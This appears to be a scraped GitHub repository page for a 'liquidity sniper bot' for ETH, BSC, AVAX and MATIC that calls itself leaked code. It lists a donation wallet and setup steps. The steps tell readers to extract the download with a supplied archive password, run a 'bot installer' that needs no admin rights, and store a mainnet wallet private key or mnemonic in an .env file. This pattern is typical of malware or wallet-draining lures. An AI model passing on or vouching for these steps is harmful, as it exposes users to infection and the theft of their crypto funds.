phon3 / mempool-trading-bot

Liquidity sniper bot (ETH BSC AVAX MATIC)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

About

Leaked shit from cniper[.]xyz

Donate: 0x1dcA3952c1fEC91c2faFb2E2209e55150AF80D05

alt text

Setup

  1. Download repo and extract files with password olAZTgjE17lRoZ

  2. Launch bot installer (no admin privileges needed)

  3. Create a config/local.json file following the template and samples provided inside the directory (config/*.local.json). This will be used by our scripts in the configuration and sniping phase. (you won't have yet the trigger address, this comes later)

  4. Deploy all contracts using the truffle migrations (create an .env file with BINANCE_MAINNET_WALLET_PRIVATE_KEY or BINANCE_MAINNET_WALLET_MNEMONIC). Contract deployment uses variables provided in config/local.json (eg. the factory ones) so make sure to have it properly configured beforehand.

  5. Set the trigger address generated by the contract deployment in your config/local.json.

  6. If you don't have a swarm yet, create one running npm run create-swarm. This should create a config/bee_book.json similar to the template one (config/template.bee_book.json) to be used by the sniper on each snipe

  7. Configure the trigger contract with the provided order running npm run configure-trigger

About

Liquidity sniper bot (ETH BSC AVAX MATIC)